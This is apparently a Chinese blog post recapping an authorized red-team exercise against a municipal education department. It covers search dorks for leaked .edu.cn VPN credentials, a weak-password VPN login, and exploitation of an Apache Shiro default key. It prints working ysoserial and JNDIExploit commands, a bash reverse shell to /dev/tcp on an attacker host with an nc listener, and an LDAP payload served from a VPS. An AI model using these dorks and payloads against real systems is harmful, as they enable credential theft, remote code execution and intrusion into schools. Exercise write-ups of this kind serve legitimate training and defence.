攻防演练-某市级教育厅HW复盘总结

前言

正如今年的高考题目，学习应从本手开始，把基础打好，才能在实战中打出妙手操作，如果眼高手低，往往会落到俗手的下场

这次攻防演练每个队伍分配不同的目标，有些队伍拿的点可以直接nday打，有些队伍外网打点十分困难比如我们，但分数是是统一算的，可以说不是那么的公平

不过也算是提供了些许经验，简单做一下总结，都是比较基础的东西，如有写的不正确的地方欢迎各位师傅指正

外网打点

敏感信息泄露

一般来说学校外网能拿直接权限的点已经很少了，web应用大多是放在vpn后面，因此能弄到一个vpn账号可以说是事半功倍

另外还可以通过语法筛选出存在默认弱口令的系统，常用命令如下：

#google语法
site:*.edu.cn intext: vpn | 用户名 | 密码 | 帐号 | 默认密码

#github
*.edu.cn password

查看方式优先选择最近更新，太久远的基本上失效了

这里队友收集到了某个目标的vpn账号，使用的是 姓名拼音/12345678 弱口令

进去内网后能访问的只有一个OA系统，测试了一下没发现什么东西，寻找其他突破口

shiro无链

常规的打点可通过fofa、hunter、quake等网络测绘平台进行资产收集，收集好后进行去重，把去重后的资产列表进行批量指纹识别，筛选出重要易打点的系统

在常规的hw中这些方法比较通用，但是对于教育行业来说会相对困难，有edusrc的存在许多通用型漏洞已经被提交修复了，因此在信息搜集的时候要多去寻找旁站和一些容易被遗漏的站点

坐了一天牢后，终于通过测绘平台找到一个比较偏的资产，直接访问是一个静态页面，但扫描目录后指纹识别一波发现是shiro

直接工具开冲，发现有默认key但是无利用链

这里想到之前学习shiro可以无依赖利用，感觉有戏尝试一波，相关知识可学习此文章 https://www.le1a.com/posts/a5f4a9e3/

1 2	java -jar shiro_tool.jar 地址 VPS:端口

通过dnslog测试有回显，这里有个注意点：使用 http://dnslog.cn/ 部分站点会拦截，可以换多个dnslog平台测试

dnslog有回显接下来就是拿shell了，这里由于固化思维，之前遇到的都是linux系统，先入为主觉得是Linux，结果没利用成功

这里可以通过网站快速生成payload，https://x.hacking8.com/java-runtime.html

一开始以为是防火墙拦截，后面队友探测了一下目录结构，发现是windows，所以这里payload要改变一下

Linux：

1
2
3

java -cp ysoserial-0.0.8-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 88 CommonsBeanutils1 "bash -c {echo,字段}|{base64,-d}|{bash,-i}"
字段=bash -i >& /dev/tcp/x.x.x.x/8888 0>&1 base64后的值
nc -lvp 端口

Windows：

1
2
3

java -jar JNDIExploit-1.0-SNAPSHOT.jar -i VPS地址
java -cp ysoserial-0.0.6-SNAPSHOT-1.8.3.jar ysoserial.exploit.JRMPListener 88 CommonsBeanutils2 "ldap://VPS地址:1389/Basic/Command/Base64/d2hvYW1p"
d2hvYW1p为命令的base64，这里是执行命令whoami